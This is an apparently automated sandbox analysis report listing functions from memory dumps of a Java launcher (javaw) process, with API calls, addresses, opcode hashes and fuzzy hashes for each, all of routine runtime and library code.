Instruction Fuzzy Hash: EC0149B37052186F8B268F79EC419B637A7BBC83607285134FA04FB0A4DA30D8868791

Function 00E1F8E0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00E1F91A

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 51fd0b252bf280b2890327eb14bfdfba329cb50f298b9df044dde7155c66b3b6
Instruction ID: c02be369d762769675d9ca9cbeccba70140ffe03ce43e078d1d27879995e3b21
Opcode Fuzzy Hash: 51fd0b252bf280b2890327eb14bfdfba329cb50f298b9df044dde7155c66b3b6
Instruction Fuzzy Hash: 541118B1A0410AAFCB05DF58E9419DB7BF5EF48314F0540A9F809EB252D670E911CBA4

Function 00E1B5E0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00E1D5A0,?,?,00E1D5A0,00000220,?,00000000,?), ref: 00E1B612

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 967bc280845ac6965f79724510ddaa00c3ae52b465b9ec022490be3e2ef9e542
Instruction ID: 7e2507f91e2dd495204808a22ef55bf6f227e3797dacb662c22f51793c706a90
Opcode Fuzzy Hash: 967bc280845ac6965f79724510ddaa00c3ae52b465b9ec022490be3e2ef9e542
Instruction Fuzzy Hash: BDE0E53150412457E72127779D06BDB7A899FA13A4F052160FC04B20D1EF60CC8081E0

Function 6FAAAB5B Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,6FB3E380,?,6FAAA8F0), ref: 6FAAAB75

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: bf7977f0d2e8e19aff3bf247b4cff8169677b826157b64880d59027f5ab5b241
Instruction ID: 6fd5f66c4f7a35b4165072317fe98ef4b32cbed614135afe314743571888b144
Opcode Fuzzy Hash: bf7977f0d2e8e19aff3bf247b4cff8169677b826157b64880d59027f5ab5b241
Instruction Fuzzy Hash: CFF030B1519784DBDB08AF78D34532FBBE5AF85718F11881DD08887380DBBA88C98B53

Function 6D5EC8D0 Relevance: 1.5, APIs: 1, Instructions: 18threadCOMMON

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,6D5A30F8,?,6D58758D,00000000,?,6D5A30F8,00000000,?), ref: 6D5EC8EF

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: PriorityThread
String ID:
API String ID: 2383925036-0
Opcode ID: f6cb5ab736c31675c1d466fc04ef85d6a8275f21237dd662e5dbebd24294b939
Instruction ID: 5b2eb12df43e0049de22f83c0ab11493e64c3331a481fce061d9d1a4c3bd714c
Opcode Fuzzy Hash: f6cb5ab736c31675c1d466fc04ef85d6a8275f21237dd662e5dbebd24294b939
Instruction Fuzzy Hash: 94D0173119850DAFEF009BA4D808F747BA4EB11210F0055A1F90CCA561C731D4A09640

Function 00E18FCA Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00E03DFD,00000000,?,00E193D2,?,?,00000000,?,00E193D2,00E03DFD,0000000C), ref: 00E18FE7

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ecc2207b7344038824495b5b9a3c42154276b337f8d9211f87fa38845116f97e
Instruction ID: 79cf812508b2487701f0e4faef5ef07962310d0932cd8583889eb5f08111b7df
Opcode Fuzzy Hash: ecc2207b7344038824495b5b9a3c42154276b337f8d9211f87fa38845116f97e
Instruction Fuzzy Hash: 4ED06C3200010DBFDF128F85DC46EDA3BAAFB48714F114000BE1866020C732E962AB94

Function 6D5EBDF0 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?,?,6D587B89,?,?,?,?,6D5A4A7A,?,?,6D52CABA,00000000), ref: 6D5EBDFF

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9b05a24a5dce365a4e4c7d11bce6c021af97d8338a03f86d5d83f1870b19f1b7
Instruction ID: 31d6fae3372f7969777b7bffd6725e0f9dca35347f8fcb5cd62d698d106a21df
Opcode Fuzzy Hash: 9b05a24a5dce365a4e4c7d11bce6c021af97d8338a03f86d5d83f1870b19f1b7
Instruction Fuzzy Hash: 30C04831110208DFDB009F89E849E947BA9AB08A10B0140A0F90C8B222C721E8208BA1

Function 6D51EDB0 Relevance: 1.3, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6D51EDBD

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 00036858f33d30a8aee3355d4edf401304cb83b6a2218904a99c9fff8edc165c
Instruction ID: f0e41d4df9fa55ee1c0a984d18201d109103e5b93ecfc53df4a461e56816173f
Opcode Fuzzy Hash: 00036858f33d30a8aee3355d4edf401304cb83b6a2218904a99c9fff8edc165c
Instruction Fuzzy Hash: 72015635604B05ABDB24CF65C880E6AB7F5FB48224B014A2DE61A87A50DB32BD51CBC0

Function 6FA9C59E Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6FA9C5AE

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: ec9e1fb468db004586f5a56e62e866dc604a495e355d3530bb4c7921264c7145
Instruction ID: d45c4e868fcff0c8e582b0368b7701fb80e4790e3a7d0674b518492721dfcf51
Opcode Fuzzy Hash: ec9e1fb468db004586f5a56e62e866dc604a495e355d3530bb4c7921264c7145
Instruction Fuzzy Hash: 58F039B0818309ABCB009F65D9C051DBBE8EF40248F048469D8888F241D338E680CB51

Non-executed Functions

Function 00E06AFD Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 124fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(?,00E36B90,?,00000000,00000000,00000000,00E06881,00000000,?,?,00000000,?,?,?,00E06AC5,00000000), ref: 00E06B26
FindNextFileA.KERNEL32(00000000,00E36B90,?,00000000,?,?,00E06AC5,00000000,?,0000003B,00000000,?,00E0373F,?,?,00000000), ref: 00E06B65
_strlen.LIBCMT ref: 00E06B7C
_strlen.LIBCMT ref: 00E06BC7
_strlen.LIBCMT ref: 00E06BCF
FindClose.KERNEL32(00000000,?,?,00E06AC5,00000000,?,0000003B,00000000,?,00E0373F,?,?,00000000,00000001), ref: 00E06C27

Strings

jar, xrefs: 00E06B93
JAR, xrefs: 00E06BA4

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: Find_strlen$File$CloseFirstNext
String ID: JAR$jar
API String ID: 1792459014-1396542530
Opcode ID: 05d221f964f2c9860b468494bb7aa9b11c23353cb68f457955d278ce99e2ebc1
Instruction ID: 958db2f4f00cfdb28fa0f2f3479b0984cfe60cc6925834de79385f38b9f5702f
Opcode Fuzzy Hash: 05d221f964f2c9860b468494bb7aa9b11c23353cb68f457955d278ce99e2ebc1
Instruction Fuzzy Hash: 3F31C271108309AFDB18AF24DC86F6AB7E8DF01728F10295DF501BB1C2EF61E9948A25

Function 00E05B72 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 118windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00E05B85
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E05B9F
_strlen.LIBCMT ref: 00E05C0C
__vsnprintf.LIBCMT ref: 00E05C25
MessageBoxA.USER32(00000000,00000000,Java Virtual Machine Launcher,00000010), ref: 00E05C4B
LocalFree.KERNEL32(00000000), ref: 00E05C98

Strings

Java Virtual Machine Launcher, xrefs: 00E05C43

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: Message$ErrorFormatFreeLastLocal__vsnprintf_strlen
String ID: Java Virtual Machine Launcher
API String ID: 2954615078-898708411
Opcode ID: 572784c70edfb6429781ea391a9c82d210469b0d1e568bd4748994b0e6f2ae01
Instruction ID: 4774d40b92546c612165fe6890248e46dfd0fd8a30da284526ec2e321cfdc1c6
Opcode Fuzzy Hash: 572784c70edfb6429781ea391a9c82d210469b0d1e568bd4748994b0e6f2ae01
Instruction Fuzzy Hash: E5311873505214BFEB25AB609C0AFEF7BA89F01704F285059F5047A0C2EB715E85DA65

Function 6FA55804 Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6FA55810
memset.VCRUNTIME140(?,00000000,00000003), ref: 6FA55836
memset.VCRUNTIME140(?,00000000,00000050), ref: 6FA558C0
IsDebuggerPresent.KERNEL32 ref: 6FA558DC
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FA558FC
UnhandledExceptionFilter.KERNEL32(?), ref: 6FA55906

Memory Dump Source

Source File: 00000010.00000002.3208903167.000000006FA41000.00000020.00000001.01000000.00000018.sdmp, Offset: 6FA40000, based on PE: true

Associated: 00000010.00000002.3208878111.000000006FA40000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208959533.000000006FA5F000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208984957.000000006FA60000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa40000_javaw.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
String ID:
API String ID: 1045392073-0
Opcode ID: a3db427c6cec1a0e8e955bfd6c96870c9d0b5699e48d56d0f35bd72392881379
Instruction ID: dfcb1484d05d9c6cb9fd0ecd21391c5a83c34d2697614e0ea60bcc07907d5ca7
Opcode Fuzzy Hash: a3db427c6cec1a0e8e955bfd6c96870c9d0b5699e48d56d0f35bd72392881379
Instruction Fuzzy Hash: E3313675D0531CDFDB10DFA4C9897CDBBB8AF08304F1080AAE409AB280EB759B998F54

Function 00E15150 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6309289e2e1ac381695a2df48d78f8c6b03db002073c5924e738416b02c57279
Instruction ID: ac8c610cd9d716eb2cbc5c094c4c7918ad93c46d4d0317d3df35c09f93f3866d
Opcode Fuzzy Hash: 6309289e2e1ac381695a2df48d78f8c6b03db002073c5924e738416b02c57279
Instruction Fuzzy Hash: BE020C72E01619DBDB14CFA9D9806EDBBF2FF88314F24826AD519B7341D731A9818B90

Function 00E09C5D Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E09C69
IsDebuggerPresent.KERNEL32 ref: 00E09D35
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E09D55
UnhandledExceptionFilter.KERNEL32(?), ref: 00E09D5F

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: f2e72c17c7c5ef63a2d38cad1761fa4b2a034d8101dc8fe2472f48dd7e330751
Instruction ID: 01f81992040e83af9f9bce805b9ec590f59a56a4bb1f37d6d0c05f22ea6bda68
Opcode Fuzzy Hash: f2e72c17c7c5ef63a2d38cad1761fa4b2a034d8101dc8fe2472f48dd7e330751
Instruction Fuzzy Hash: 74314975D0131C9BDB20DFA4D989BCCBBF8BF08304F1050AAE50DAB291EB715A898F05

Function 00E1AAED Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00E1ABE5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00E1ABEF
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00E1ABFC

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 8e1f166d7e0cc3751f0c133203198fa0d0db1290e0b972c5c3ba9de65bb5b66a
Instruction ID: 35f81177bf89f8a6fa1189a4b4a9be5f01d442eea746e9e7c8a900ed9564310e
Opcode Fuzzy Hash: 8e1f166d7e0cc3751f0c133203198fa0d0db1290e0b972c5c3ba9de65bb5b66a
Instruction Fuzzy Hash: 0E31C17490122CABCB21DF28D989BDDBBB8BF08310F5051EAE41CA6291E7709FC58F45

Function 00E09F05 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E09F1B

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: b428b23e7d73abd5e04c734f76749a18aaebdd0e46d8ff650f97fb312e317c12
Instruction ID: 52d77894bbb7384d55b5a2bff9153b54c86be10993e519f52faefc6665f6243c
Opcode Fuzzy Hash: b428b23e7d73abd5e04c734f76749a18aaebdd0e46d8ff650f97fb312e317c12
Instruction Fuzzy Hash: 065159B1A0560D8FEB28CF6AD9857AABBF0FB48318F14906AD445FB291D3749D84CF50

Function 6D5E73E0 Relevance: 1.5, APIs: 1, Instructions: 8networkCOMMON

Download Yara Rule

APIs

bind.WSOCK32(?,?,?,?,6D51F55F,?,?,?), ref: 6D5E73EC

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

